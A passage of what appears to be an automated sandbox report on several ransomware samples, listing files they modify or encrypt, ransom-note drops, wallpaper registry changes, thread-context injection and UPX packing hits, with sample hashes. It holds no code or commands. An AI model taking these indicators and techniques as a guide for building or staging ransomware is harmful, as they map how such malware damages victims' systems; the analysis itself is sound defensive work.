C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_execution_policies.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_debuggers.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\System.Management.Automation.dll-Help.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\de-DE\Licenses\_Default\UltimateN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp002.inf_amd64_neutral_04d05d1f6a90ea24\Amd64\HPF6980T.XML Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\es-ES\Licenses\_Default\UltimateN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\fr-FR\Licenses\OEM\HomeBasic\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Commands.Management.dll-Help.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_regular_expressions.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_jobs.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\Microsoft.PowerShell.Commands.Management.dll-Help.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\it-IT\Licenses\eval\Ultimate\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_scopes.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_command_precedence.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp002.inf_amd64_neutral_04d05d1f6a90ea24\Amd64\HPC5200F.XML Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp002.inf_amd64_neutral_04d05d1f6a90ea24\Amd64\HPC9500S.XML Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp004.inf_amd64_neutral_53f688945cfc24cc\Amd64\hpc5300t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\fr-FR\Licenses\OEM\HomeBasicE\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_arrays.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Continue.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\es-ES\Licenses\OEM\Ultimate\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomePremiumN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\fr-FR\Licenses\OEM\HomePremium\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_command_precedence.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnkm003.inf_amd64_neutral_48652cda3bb15180\Amd64\kop4650X.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\ja-JP\Licenses\eval\ProfessionalN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_properties.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_split.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Variables.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_split.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnsa002.inf_amd64_neutral_d9df1d04d8cbe336\Amd64\smx8x3u.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremium\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\ja-JP\Licenses\_Default\EnterpriseE\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_scopes.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpc6200t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_If.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Comment_Based_Help.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Switch.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnca00b.inf_amd64_neutral_4412894f52d39895\Amd64\CNBJ3030.TBL Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\es-ES\Licenses\OEM\EnterpriseE\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_hash_tables.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\de-DE\Licenses\_Default\HomeBasic\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\es-ES\Licenses\OEM\HomeBasicN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_remote_jobs.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_locations.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpc4100t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\en-US\Licenses\_Default\Professional\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\System.Management.Automation.dll-Help.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_modules.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpj4680t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_profiles.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_try_catch_finally.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe -
Sets desktop wallpaper using registry 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\DDx.bmp" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\vRS.bmp" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bmpb28cbcab.bmp" otheo.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 540 set thread context of 3928 540 Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe 76 PID 540 set thread context of 3928 540 Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe 76 PID 1740 set thread context of 2132 1740 Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe 86 PID 1828 set thread context of 1288 1828 Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe 106 PID 484 set thread context of 4600 484 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 107 PID 1648 set thread context of 3468 1648 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe 115 PID 3112 set thread context of 6848 3112 Windows Update.exe 341 PID 6848 set thread context of 5364 6848 Windows Update.exe 490 -
resource yara_rule behavioral1/files/0x0005000000019cd5-99.dat upx behavioral1/files/0x00050000000195ca-85.dat upx behavioral1/memory/1260-122-0x0000000000400000-0x00000000004A5000-memory.dmp upx behavioral1/memory/752-121-0x000000000F270000-0x000000000F28B000-memory.dmp upx behavioral1/memory/2192-7342-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/2192-7332-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/2192-7331-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/2192-7330-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/2192-7329-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/2192-7685-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/1260-12043-0x0000000000400000-0x00000000004A5000-memory.dmp upx behavioral1/memory/448-12082-0x0000000000400000-0x00000000004A5000-memory.dmp upx behavioral1/memory/448-13344-0x0000000000400000-0x00000000004A5000-memory.dmp upx behavioral1/memory/448-42451-0x0000000000400000-0x00000000004A5000-memory.dmp upx behavioral1/memory/752-42454-0x000000000F270000-0x000000000F28B000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Teal.css.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105380.WMF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\ja-JP\PurblePlace.exe.mui Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.IO.Log.Resources.dll Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Restore-My-Files.txt Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\subscription.xsd Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115841.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\libttml_plugin.dll.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Office14\3082\Restore-My-Files.txt Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10299_.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msaddsr.dll.mui Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\DVD Maker\bod_r.TTF Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ENFR\MSB1ENFR.ITS.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222021.WMF Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18182_.WMF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ONBttnOL.dll.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue.css.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libgain_plugin.dll Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_K_COL.HXK.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libcaf_plugin.dll Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\DVD Maker\Pipeline.dll Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sr.pak.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\INFOPATH.EXE.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30F.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageBlank.gif Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\SessionMember.ico.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PROFILE\THMBNAIL.PNG.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00526_.WMF.id-DA208E5B.[[email protected]].gamma 